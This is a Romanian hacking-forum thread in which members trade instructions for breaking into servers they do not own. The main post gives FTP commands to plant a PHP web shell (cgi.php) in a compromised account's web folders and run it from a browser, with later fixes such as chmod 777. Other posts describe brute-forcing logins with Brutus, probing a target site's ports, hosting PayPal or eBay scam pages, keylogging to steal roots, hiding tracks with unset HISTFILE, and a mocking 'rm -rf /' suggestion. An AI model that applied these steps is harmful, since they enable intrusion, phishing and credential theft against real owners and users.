Bine ati venit pe HackTeam Forum !
Aici veti gasi o gama larga de metode de hack atat pe Windows cat si pe platforme Linux/Unix , programe in consecinta ,tutoriale .
In acelasi timp aici veti gasi si asistenta help in materie corespunzatoare . Precizam ca tot ce se gaseste pe acest site este doar in scop de dezvoltare iar voi va asumati intreaga raspundere pt actiunile pe care le savarsiti . || SS-TEAM || Va Multumeste pt vizita !
|
Lista Forumurilor Pe Tematici
|
Bine ati venit pe HackTeam Forum ! | Reguli | Inregistrare | Login
POZE BINE ATI VENIT PE HACKTEAM FORUM !
Nu sunteti logat.
|
Nou pe simpatie:
crazygirl la Simpatie.ro
 | Femeie
23 ani
Buzau
cauta Barbat
26 - 80 ani |
|
Slasher
Membru
 Inregistrat: acum 19 ani
Postari: 10000009
|
|
Si nologinurile pot fi folosite iti trebuie un alt root activ pe linux, de pe care sa lucrezi, hai sa incepem :
1. Ia arhiva wget
2. Dai comanda " ftp ipu_nologinului " la name pui useru si la password passu nologinului.
3. Daca iti zice Logged In sau ceva de genu dai urmatoarele comenzi : mkdir www ; mkdir web ; mkdir public_html dupa ce ai create aceste foldere vei pune cgi.php in fiecare ; cd public_html ; put cgi.php ; cd .. ; cd web ; put cgi.php ; cd .. ; cd www ; put cgi.php ; cd .. ; quit . Si gata 
4. Deschizi un Internet Explorer si la address bagi : http://ip`u/~user/cgi.php
5. De aici lucrezi ca si dintr-o roata normala . 
_______________________________________
|
|
| pus acum 19 ani |
|
|
seby
newbie
Inregistrat: acum 19 ani
Postari: 2
|
|
Salut !! Am incercat si eu chestia asta cu nologinu-rile si nu prea am reusit mare lucru ..!! De ex: ./psybnc ./mech nu pot sa pornesc nimik !! Exista alta comanda pt. pornirea executabilului ??? Mersi !! 
|
|
| pus acum 19 ani |
|
Slasher
Membru
Inregistrat: acum 19 ani
Postari: 10000009
|
|
seby , root-ul respectiv are portul pe care l-ai setat la bnc deschis , cand incerci sa te conectezi pe ip-ul root-ului ce iti zice ? " * Unable to connect to server (Connection refused) " sau " * Unable to connect to server (Connection timed out) " , daca iti zice prima varianta verifica cu atentie ce OS ai si pune arhiva corespunzatoare , iar daca iti zice cealalta varianta , si anume Connection timed out , sa sti ca portu setat de tine in arhiva este inchis ; in cazu' asta te sfatuisc sa pui un port deschis 
_______________________________________
|
|
| pus acum 19 ani |
|
GameOver
Membru nou
 Din: Bucuresti
Inregistrat: acum 19 ani
Postari: 19
|
|
cand incerc sa dau http://ip`u/~user/cgi.php in internet explorer imi da o eroare, spune ceva de genu : Permision denied ...eu stiam de chestia asta, dar se putea si din internet explorer. Este o chestie aici, daca se conecteaza pe ip-ul nologinului pe port 21 in mIRC inseamna ca se deschide si in ftp pe internet explorer. cgi.php intr-adevar trebuie pus in toate folderele , www, public_html si web.
In fine....am incercat si de pe root :
ftp> cd ..
250 CWD command successful
ftp> cd www
250 CWD command successful
ftp> put cgi.php
local: cgi.php remote: cgi.php
227 Entering Passive Mode (83,18,100,94,255,167)
150 Opening BINARY mode data connection for cgi.php
226 Transfer complete.
1144 bytes sent in 3.4e-05 seconds (3.3e+04 Kbytes/s)
ftp> cd ..
250 CWD command successful
ftp> quit
221 Goodbye.
Eu am o problema mai complicata, si daca stie cineva solutia va rog sa mi-o spuneti :
Incerc de ceva timp sa sparg o pagina pe care am boala de mult timp.
I-am scanat porturile si arata cam asa (vezi captura facuta mai jos).
Dupa cum se vede porturile sunt deschise. Ok...in acest caz ce-mi mai ramane de facut ? Sa aflu id si pass de la ftp. Cum fac asta ? are cineva vreun program sau vreo varianta mai inteligenta ?
Astept neaparat raspuns.
47.6KB
_______________________________________
The Game Is Over !
|
|
| pus acum 19 ani |
|
sifak
Administrator
 Inregistrat: acum 19 ani
Postari: 142
|
|
Mai GameOver : cum le-am zis si la restu , incearca mai intai sa te conectezi telnet la fiecare dintre porturile deschise sa vezi daca nu cumva poti exploata daemonurile ce le gasesti deschise . sincer din screen-ul ce e aici nu inteleg nimic incearca sa pui o imagine mai mare .
_______________________________________
[ No Games , Just sifaK ]
|
|
| pus acum 19 ani |
|
GameOver
Membru nou
Din: Bucuresti
Inregistrat: acum 19 ani
Postari: 19
|
|
Asta este captura. Nu conteaza pre mult captura, este doar o demonstratie, pentru a-ti da seama ca site-ul tinta are o gramada de porturi deschise.
Nu prea inteleg cum sa ma conectez pe Telnet la porturile respective...poti sa faci o fapta buna si sa-mi dai niste comenzi ?
Mercy pentru raspuns ! 
51KB
_______________________________________
The Game Is Over !
|
|
| pus acum 19 ani |
|
sifak
Administrator
Inregistrat: acum 19 ani
Postari: 142
|
|
Bine . Deci e simplu . Pentru a Intra pe Telnet trebuie sa accesezi : run/telnet .
Ca sa incerci sa te conectezi pe un host la un anumit port de pe telnet trebuia doar sa dai,in consola telnet,comanda : open host port
ex: open 84.234.97.181 139
Pentru o vedere mai clara a Telnetului vezi sectiunea : / Windows - Hacking ! / Telnet Explicat !
Bafta !
_______________________________________
[ No Games , Just sifaK ]
|
|
| pus acum 19 ani |
|
Win32
Th3 Best
 Inregistrat: acum 19 ani
Postari: 269
|
|
Si eu am boala pe unele pagini web 
Si totusi nustiu cum sa le aflu userul ca parola mi se pare mai simpla. De exemplu eu mi-am spart propriul site cunoscandu-mi userul, iar parola am aflat-o brute force (Brutus -AET2) e cam veki cei drept, dar a mers.
O faza tare e ca nu am putut uraca niste virushi pe ea, cum spunea si SIFAK la un momentdat, decat dupa ce am intrat cu ftp-ul windows-ului.
PS: daca mai stiti programe mishto pt scanare(IP, port, etc..), conectare(gen telnet, putty, etc.) spuneti-mi si mie pls.
10Q
_______________________________________
*MI-AM DAT DEMISIA DE PE ACEST FORUM, NU MAI SUPORT STERSUL PROVOCAT DE n00bi.
*Pt mai mlte detalii vizitati sectiunea "Parerea ta"
|
|
| pus acum 19 ani |
|
Win32
Th3 Best
Inregistrat: acum 19 ani
Postari: 269
|
|
Oki, e simplu de folosit, eu am omis sa spun ca imi stiam parola la ftp doar ca am vrut sa testez programul.
In fine, uite un link de unde il poti downloada:
E simplu, am sati zic cateva comenzi:
***La target=IP-ul/hostname(hostname=site-ul fara www, http sau ftp in fata, de ex: pui gogu.ro
***Type=ai optiuni ce ai vrea sa spargi: ftp, http, pop3, telnet,etc...
***prot=ti se va modifica automat in functie de alegere ftp, http, sau telnet
La restu mai umbli pana la "Authentication option"
***Username=scri userul (dk l-ai aflat) , sau poti sa-i dai sa caute din wordlist nume, dar nuprea cred ca va mere asa, mai bine afli tu userul.
***Password=si aici iti sugerez sa folosesti brute force nu wordlist.txt.
oki, dupa ce ai dat brute force, va trebui sa ii dai un rang de cifre si litere si lungime a parolei.
Pai cam atat, dk mai sunt nelamuriri posteaza pe forum, dar eu cred ca ai sa te descurci.
Bafta!!
_______________________________________
*MI-AM DAT DEMISIA DE PE ACEST FORUM, NU MAI SUPORT STERSUL PROVOCAT DE n00bi.
*Pt mai mlte detalii vizitati sectiunea "Parerea ta"
|
|
| pus acum 19 ani |
|
Win32
Th3 Best
Inregistrat: acum 19 ani
Postari: 269
|
|
GameOver tu sti sa folosesti Applet Password??
Dk da, zimi si mie pls, ce pot sparge cu el si cum.
Eu il am da nush sa umblu cu el. 
Am uitat sa-ti mai zic ca AV-ul iti vede BRUTUS ca virus de crack.(CWcrack)
Dk nu mere sa-l downloadezi copiaza-ti link-ul in browser si dai enter.
Uite un screenshot cu brutus:
20.3KB
_______________________________________
*MI-AM DAT DEMISIA DE PE ACEST FORUM, NU MAI SUPORT STERSUL PROVOCAT DE n00bi.
*Pt mai mlte detalii vizitati sectiunea "Parerea ta"
|
|
| pus acum 19 ani |
|
Revenge
Membru
 Din: Almeria
Inregistrat: acum 18 ani
Postari: 185
|
|
pentru useru fara access ssh trebuie sa te conectezi pe ftp la ip si sa cauti in foldere, cd /home/.users (de obicei aici is userii cu site-uri)..
de multe ori site-ul pe care il vezi in ie nu apartine userului respectiv ....plimbate putin pe site vezi ce foldere se fac cand intri la cate un link si dupa stii mai usor ce user trebuie sa cauti si unde e index.html pui si scriptu nu neaparat in www sau in public_html de aia cred multi ca nu merg facute )
si dupa intri http://ip/shell.php sau scriptu php care l-ai pus si nu intodeauna user-ul are drept de executare de asta nici nu prea isi complica lumea capu cu ele dar poti sa faci site-uri frumoase sau sa pui arhivele tale personale de buti de bnc ca sa nu stai mereu sa cauti link sau pui pagina scam http://ip/paypal sau ebay sau orice altceva )
_______________________________________
Apocalipsa
|
|
| pus acum 18 ani |
|
Revenge
Membru
Din: Almeria
Inregistrat: acum 18 ani
Postari: 185
|
|
Gabryel a scris:
hai ca eu sunt nou aici si am ssh22 inchis altfel inafara de aol si compuserve ca ocupa multa memorie numai exista sa iti schimbi ip`u si sa ti se redeschida ip`u si sa iti mearga bine netu .... eu umblu cu roate si manevre de vreo 1 an jumatate ma pricep cat de cat ... pana acu sa moara fram daka am scanat cel putin odata am folosit keyloggere si furam root`uri si e mult mai usor asa decat sa scanezi zic eu |
mie aol nu imi ocupa multa memorie dar nici nu mai folosesc si daca ai ssh inchis e pentru ca cineva din reteaua ta a scanat si a fost logat ip-ul si trimis log la ISP... eu nu ii vad famecu la keylogger mai frumos e sa scanezi asta bineneteles daca ai cu ce
_______________________________________
Apocalipsa
|
|
| pus acum 18 ani |
|
pascvacile
newbie
 Inregistrat: acum 18 ani
Postari: 8
|
|
care VINDE de aici? sa ma caute shi pe mie .... am acelashi id de yahoo .... ca sa negociem....
|
|
| pus acum 18 ani |
|
|
bzzz
newbie
Inregistrat: acum 18 ani
Postari: 6
|
|
Gabryel a scris:
hai ca eu sunt nou aici si am ssh22 inchis altfel inafara de aol si compuserve ca ocupa multa memorie numai exista sa iti schimbi ip`u si sa ti se redeschida ip`u si sa iti mearga bine netu .... eu umblu cu roate si manevre de vreo 1 an jumatate ma pricep cat de cat ... pana acu sa moara fram daka am scanat cel putin odata am folosit keyloggere si furam root`uri si e mult mai usor asa decat sa scanezi zic eu |
Esti un adevarat hacker, "sa moara fram daka" nu. Daca ai root (nu shell, partea proasta e ca prea putini fac diferenta intre shell si root, desi am vazut si persoane le forum care stiu ce e ala hacking, dar ... prea putini) ai putea sa incerci sa instalezi un Squid cu Socks5. Te-am depasit?
Incearca sau ... cel mai bun prieten al omului . Daca nu te descurci incearca rm -rf / .
dani13^}P{ a scris:
ftp: connect: Connection timed out
o picat rootul ? sau ce are ? de nu merge ? pls help !
o fine sa zicem ca mam conectat !
pot sa scanez de pe el ? sau cum il foloesc din internet explorer ? (yo a mlinux) va rog help ! si daca pot sa pun scaner pe el inseamna ca pot sa bag bnc mehc flood ? ......... ??
daca se paote inseamna ca is bazat ca am o gramada de nologuri ! |
Ghinion, ai dat de un server cu un administrator care stie cum arata un IPTables. Nu stiu ce PHPShell folosesti, si nu stiu ce fel de server e ala (daca e webhosting e bine). Poti sa pui un phpshell doar daca apache este compilat cu php si are functia safe_mode oprita. Nu e chiar asa usor cu nologin-urile, stai linistit.
Revenge a scris:
pentru useru fara access ssh trebuie sa te conectezi pe ftp la ip si sa cauti in foldere, cd /home/.users (de obicei aici is userii cu site-uri)..
de multe ori site-ul pe care il vezi in ie nu apartine userului respectiv ....plimbate putin pe site vezi ce foldere se fac cand intri la cate un link si dupa stii mai usor ce user trebuie sa cauti si unde e index.html pui si scriptu nu neaparat in www sau in public_html de aia cred multi ca nu merg facute )
si dupa intri http://ip/shell.php sau scriptu php care l-ai pus si nu intodeauna user-ul are drept de executare de asta nici nu prea isi complica lumea capu cu ele dar poti sa faci site-uri frumoase sau sa pui arhivele tale personale de buti de bnc ca sa nu stai mereu sa cauti link sau pui pagina scam http://ip/paypal sau ebay sau orice altceva ) |
Ai dreptate, dar phpshell-urile folosesc userul apache-ului (nobody sau apache e standard, eu personal il schimb). Daca e asa, nu ai drept de scriere doar in /tmp, iar dir-ul asta nu e public (sau mai sti ce prostalai de admini gasesti?). PHPShell-ul asta e cu cantec, depinde de multe chestii, ca de exemplu daca vrei sa iei o arhiva de pe net (nu bnc sau boti, pentru ca mi se pare ... L-) si copilaresc), de kernel de exemplu care are cam 40 de Mega si nu o sa ti-o downloadeze in 30 de secunde o sa primesti timeout de la php (asa e setarea standard, de timeout al scrpturilor la 30 de secunde) iar fisierul care vroiai sa il downloadezi o sa ramana la marimea la care a ajuns in 30 de secunde.
Daca ai asa ceva o rezolv imediat:
my root a scris:
login as: bzzz
.ce.ip.are.tld's password:
Last login: Thu May 18 00:39:07 2006 from st09.noc.sibiu.nu-conteaza.ro
$ unset HISTFILE
$ cd /tmp
$ wget
--01:35:26--
=> `linux-2.6.16.16.tar.bz2'
Resolving kernel.org... done.
Connecting to kernel.org[204.152.191.37]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 40,837,107 [application/x-bzip2]
100%[====================================>] 40,837,107 3.75M/s ETA 00:00
01:35:36 (3.75 MB/s) - `linux-2.6.16.16.tar.bz2' saved [40837107/40837107]
$
|
Sper ca intelegeti de ce am sters diferite campuri, am vazut si persoane de 13 ani pe forumul asta care ar lua IP-ul si ar trimite mail la administratorul sistemului si .. ma trezesc tobosar. Pentru cine nu crede sa imi dea un pm si o sa ii trimit un screenshoot.
Modificat de bzzz (acum 18 ani)
|
|
| pus acum 18 ani |
|
|
orange
newbie
Inregistrat: acum 18 ani
Postari: 1
|
|
nu sthiu care e faza prezntata mai sus ca pun totul in ftp respectiv si cand dau sa intru pe cgi.php nimic imi da explorer-ul eroare care e faza..??
|
|
| pus acum 18 ani |
|
|
baratela
Membru nou
Inregistrat: acum 18 ani
Postari: 37
|
|
sal.nu merge linku de download de la brutus postat de win32..se poate sa il mai ridicati pe un ftp sa il iau si eu?ca ala de pe hoobie.com e vechi saracu din 2001...e expirat..sau daca aveto alt program de brute force prin remote....si exista si daca da are cineva vreun scanner cu brute force incorporat?si care sa si mearga...multam anticipat
|
|
| pus acum 18 ani |
|
Sad
newbie
 Din: Tulcea
Inregistrat: acum 18 ani
Postari: 3
|
|
In primul rand... hello all... sunt nou pe forum... si... vroiam sa va intreb care este faza cu no login`ele astea... ca din cate am avut pana acum... numai la unu a mers cgi.php... si cand scriu cate o comanda... imi da eroare de expolorer ca nu gaseste pagina... Explicati si voi mai babeste... sau... vedeti voi... Mersi...  
_______________________________________
Life is short... Scan more!
|
|
| pus acum 18 ani |
|
|
GameZoveR
newbie
Inregistrat: acum 18 ani
Postari: 3
|
|
Hey,I'm new...
1 . cgi.php nu e arhiva e doar un PhPShell modificat de un script kiddie(care a adaugat langa PHP SHELL ,OFFENDER) pentru a se simti mai important...Pe net gasiti si alte variante gen Php Shell Mazurrel sau dc nu chiar PhP Shell GameZoveR avand in vedere ca si eu am fost unul de gen ceva timp in urma...Dar trebuie precizat ca e aceeasi chestie,fie el offender,mazurrel sau gamezover . :P
2 . Dupa ce intrati in ftp dati comanda dir sau ls -a si vedeti ca folderul www sau public_html ar putea exista deja .
3 . Ca sa nu mai aveti Permission Denied,dupa ce ati pus cgi.php dati si un "chmod 775 cgi.php" sau "chmod 777 cgi.php"...
4 . Daca serverul nu are php,exista si un script de genul ala si in perl...si daca nici ala nu merge,exista chiar un exploit de nologinuri dar e foarte PRIVAT...Nu incepeti cu: da si mie,vreau si eu,hai ma te rog,etc...Pentru ca nimic nu e mai penal decat un hacker cershetor...Folositi-va imaginatia 
5 . Avand in vedere ca e ora 7:00 dimineatza nush ce sa mai scriu,asa ca daca imi mai amintesc ceva modific post'ul...
6 . No offense dar cum am intrat pe forum am crezut ca e unul din miile de forumuri facute naspa si care au un singur user si vreo 2 - 3 posturi de gen da-mi un root etc...Poate e grafica anii '80 care inseala...In schimb am fost surprins de informatiile continute..Tineti-o tot asa BV (Poate mai incolo va pot ajuta cu un forum decent si bine organizat )
PS : GameOver incearca Shadow Security Scanner si dupa aia cauta informatii si exploituri pe google pentru vulnerabilitati
Modificat de GameZoveR (acum 18 ani)
|
|
| pus acum 18 ani |
|
OSHO
Membru
 Inregistrat: acum 18 ani
Postari: 453
|
|
GameZoveR a scris:
Tineti-o tot asa BV |
In caz ca n-ai observat (daca n-ai citit mesajul de sus) forumul e INCHIS. Adica pe admini ii doare la patina daca se mai face ceva cu forumul asta sau nu.
_______________________________________
Sunt Lamer, ignore me.
|
|
| pus acum 18 ani |
|
|
abys
newbie
Inregistrat: acum 18 ani
Postari: 4
|
|
The page cannot be found
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
la mine nu merge si am pus acolo faza este ca folderele erau deja facute si maia veau ceva prin ele in afara de cgi.php o sa incerc acums a sterg toate fisierlele alea poate dauneaza zine stie. daca mai e ceva de stiut in folosirea nologinurilor sa imi spuneti ca cu put cgi.php si altceva nimic nu merge pe ie. ms anticiapt astept raspuns. bafta
4KB
|
|
| pus acum 18 ani |
|
andoseg
Membru
 Din: In sud
Inregistrat: acum 18 ani
Postari: 110
|
|
Slasher a scris:
Si nologinurile pot fi folosite iti trebuie un alt root activ pe linux, de pe care sa lucrezi, hai sa incepem :
1. Ia arhiva wget
2. Dai comanda " ftp ipu_nologinului " la name pui useru si la password passu nologinului.
3. Daca iti zice Logged In sau ceva de genu dai urmatoarele comenzi : mkdir www ; mkdir web ; mkdir public_html dupa ce ai create aceste foldere vei pune cgi.php in fiecare ; cd public_html ; put cgi.php ; cd .. ; cd web ; put cgi.php ; cd .. ; cd www ; put cgi.php ; cd .. ; quit . Si gata
4. Deschizi un Internet Explorer si la address bagi : http://ip`u/~user/cgi.php
5. De aici lucrezi ca si dintr-o roata normala . |
lucrezi o laba ! nu e nimik. nu merge metoda nu mai incercati oameni buni ca incercati degeaba. sa stearga cineva subiectul asta ca e degeaba
_______________________________________
|
|
| pus acum 18 ani |
|
OSHO
Membru
Inregistrat: acum 18 ani
Postari: 453
|
|
Oh, my God! He's back !
'neata buna, andoseg ! De mult timp n-ai mai dat nici un semn de viata...
Referitor la ce a spus Slasher, e functionala treaba. Singura problema (veche de cand lumea) e ca trebuie sa aiba omu' habar de unix/linux ca sa poata face ceva.
Ce scrie mai sus functioneaza in urmatoarele conditii:
1. Sa poti da wget http://site/cgi.php ... o laie mare... trebuie redenumit ca altfel iti interpreteaza scriptul... redenumesti in cgi.php.txt si dai wget http://site/cgi.php.txt
2. Sa existe server ftp instalat ( doh! )
3. Sa fie configurat apache-ul sa accepte in directorul userului subdirectorul public_html in care sa se ruleze scripturi PHP.
4. Drepturile pe /home/userulfolosit sa fie 755 ca altfel apacheu' nu isi poate baga nasu' pe acolo
5. Sa ai rabdare si sa citesti atent toate mesajele de eroare pentru ca nici un server nu e configurat ca sa poata fi rootat 
_______________________________________
Sunt Lamer, ignore me.
|
|
| pus acum 18 ani |
|
|
|
Acum am vazut:
Slasher a scris:
1. Ia arhiva wget |
CGI.PHP ala nu e nici o arhiva, ci pur si simplu, dupa cum vedeti si la extensie, un simplu script php
|
|
| pus acum 18 ani |
|
|
|
pffff...nu mai zic nimic ...
|
|
| pus acum 18 ani |
|
andoseg
Membru
Din: In sud
Inregistrat: acum 18 ani
Postari: 110
|
|
poi cre`ca de asta nici nu mergea !
_______________________________________
|
|
| pus acum 18 ani |
|
.am fost nitzel ocupat cu roaterle de polonia phhh am luat la greu da numai destea slabe 
. si la cate ftp`uri am prins , intr`o sap. cred ca peste 100 si din ele sa zic ca am incercat jumatate nimik nu a mers cu metoda asa. acuma ce sa mai cred ?! aiurea